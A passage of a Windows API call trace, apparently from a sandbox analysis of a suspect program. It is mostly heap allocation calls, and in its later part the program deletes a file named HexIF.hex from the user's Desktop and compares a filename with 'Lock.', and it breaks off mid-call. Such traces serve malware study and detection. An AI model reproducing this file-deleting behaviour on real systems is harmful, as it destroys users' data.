RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0174.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0174.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0174.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0174.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0174.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0174.441] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0174.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0174.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0174.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0174.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0174.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0174.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0174.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0174.442] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0174.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0174.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0174.442] FreeLibrary (hLibModule=0x756e0000) returned 1 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0174.442] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0174.442] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0174.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0174.442] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0174.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0174.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0174.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0174.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0174.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0174.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0174.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0174.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0174.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0174.443] CloseHandle (hObject=0x2d0) returned 1 [0174.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0174.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0174.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0174.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0174.446] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0174.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0174.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0174.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0174.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0174.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0174.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0174.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0174.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0174.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0174.447] CloseHandle (hObject=0x2a0) returned 1 [0174.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0174.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0174.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0174.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0174.855] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0174.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0174.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0174.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0174.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0174.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0174.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0174.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0174.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0174.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0174.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0174.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0174.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0174.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0174.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0174.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0174.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0174.863] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0174.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0174.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0174.863] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0174.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0174.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0174.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0174.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0174.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0174.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0174.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0174.864] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexIF.hex", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex", lpFilePart=0x8cedf4*="HexIF.hex") returned 0x21 [0174.864] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex")) returned 0x20 [0174.864] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cb3f4e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3cb3f4e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3e7b28f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c00, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HexIF.hex", cAlternateFileName="")) returned 0xa87590 [0174.864] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex")) returned 1 [0174.953] FindNextFileW (in: hFindFile=0xa87590, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cb3f4e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3cb3f4e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3e7b28f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c00, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HexIF.hex", cAlternateFileName="")) returned 0 [0174.953] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0174.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0174.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0174.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0174.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0174.953] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0174.953] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.953] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0174.954] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0174.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0174.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0174.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0174.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0174.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0174.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0174.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0174.954] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0174.954] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e563a8 [0174.954] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexIF.hex", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex", lpFilePart=0x8cf650*="HexIF.hex") returned 0x21 [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0174.955] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexIF.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexif.hex")) returned 0xffffffff [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0174.955] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0174.955] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.955] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0174.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0174.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0174.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0174.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0174.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0174.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0174.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0174.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0174.955] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0174.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0174.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0174.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexInformation.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exInformation.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0174.956] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 